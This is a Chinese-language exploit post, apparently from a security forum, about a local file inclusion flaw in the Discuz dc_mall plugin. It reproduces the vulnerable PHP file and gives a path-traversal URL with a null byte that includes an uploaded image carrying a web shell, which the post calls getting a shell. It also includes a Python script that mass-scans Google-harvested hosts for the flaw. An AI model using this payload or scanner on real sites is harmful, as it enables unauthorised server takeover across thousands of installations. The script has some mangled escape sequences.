discuz某插件设计缺陷可前台getshell

#插件信息：
http://addon.discuz.com/?@dc_mall.plugin
官方安装量3000+ （已经不少了吧）

#测试环境：
PHP 版本为: 5.2.9-2
magic_quotes_gpc = off

dc_mall.inc.php(漏洞文件)

<?php  if(!defined('IN_DISCUZ')) {   exit('Access Denied');  }  $_lang = lang('plugin/dc_mall');  $action = $_GET['action'] ? $_GET['action'] : 'index';  $version ='Ver 1.1.1';  $cvar = $_G['cache']['plugin']['dc_mall'];  $file = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/'.$action.'.inc.php';//action参数未过滤直接传入$file 后面的用%00截断即可包含任意文件    if (!file_exists($file)||!$cvar['open']) showmessage('undefined_action');  $usercredit = getuserprofile('extcredits'.$cvar['credit']);  $mallnav = C::t('#dc_mall#dc_mall_sort')->getdata();  $sortid = dintval($_GET['sortid']);  if(empty($mallnav[$sortid]))$sortid=0;  @include $file;  $croppath = DISCUZ_ROOT.'./source/plugin/dc_mall/data/cron.php';  $cronupdate = @include $croppath;  if(TIMESTAMP-$cronupdate['timestamp']>$cvar['autotime']*60){   require_once DISCUZ_ROOT.'./source/plugin/dc_mall/cache/cache_mallinfo.php';   build_cache_plugin_mallinfo();   $configdata = 'return '.var_export(array('timestamp'=>TIMESTAMP), true).";/n/n";   if($fp = @fopen($croppath, 'wb')) {    fwrite($fp, "<?php/n//plugin mall temp upgrade check file, DO NOT modify me!/n//Identify: ".md5($configdata)."/n/n$configdata?>");    fclose($fp);   }  }  include template('dc_mall:index/'.$action);  ?>

#包含测试

#getshell
怎么shell就不用多说了，前台上传带马图片，在直接用包含就成功
www.xxx.com/plugin.php?action=../../../../../data/attachment/forum/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall

批量从谷歌采集了一批

#!/usr/bin/env python   # -*- coding: utf-8 -*-   import urllib import requests import os    def exp():     count=len(open('dz.txt','rU').readlines())     for pwd in open("dz.txt").readlines():         target=pwd.strip('/n')         proto,rest = urllib.splittype(target)         host,rest = urllib.splithost(rest)         url = "http://"+host+"/plugin.php?action=../../../../../robots.txt%00&id=dc_mall"         #print url         try:          res = requests.get(url)          #print res.content          if "robots.txt" in res.content:           print host          except Exception, e:          pass                 if __name__ == '__main__':       exp()